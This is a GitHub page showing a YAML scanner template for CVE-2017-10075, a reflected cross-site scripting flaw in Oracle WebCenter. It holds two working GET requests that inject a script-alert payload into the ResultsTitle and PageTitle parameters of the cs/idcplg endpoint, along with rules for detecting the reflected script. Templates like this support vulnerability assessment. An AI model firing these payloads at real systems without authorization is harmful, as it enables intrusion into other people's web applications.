forked from coolboy0816/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2017-10075.yaml
30 lines (28 loc) · 1.56 KB
/
CVE-2017-10075.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
id: cve-2017-10075
info:
name: Oracle WebCenter XSS
risk: High
params:
- root: '{{.BaseURL}}'
variables:
- endpoint: |
cs/idcplg
requests:
- method: GET
url: >-
{{.root}}/{{.endpoint}}?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
StatusCode() == 200 && StringSearch("resBody", "<script>alert(31337)</script>")
- method: GET
url: >-
{{.root}}/{{.endpoint}}?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
StatusCode() == 200 && StringSearch("resBody", "<script>alert(31337)</script>")
references:
- https://www.cvebase.com/cve/2017/10075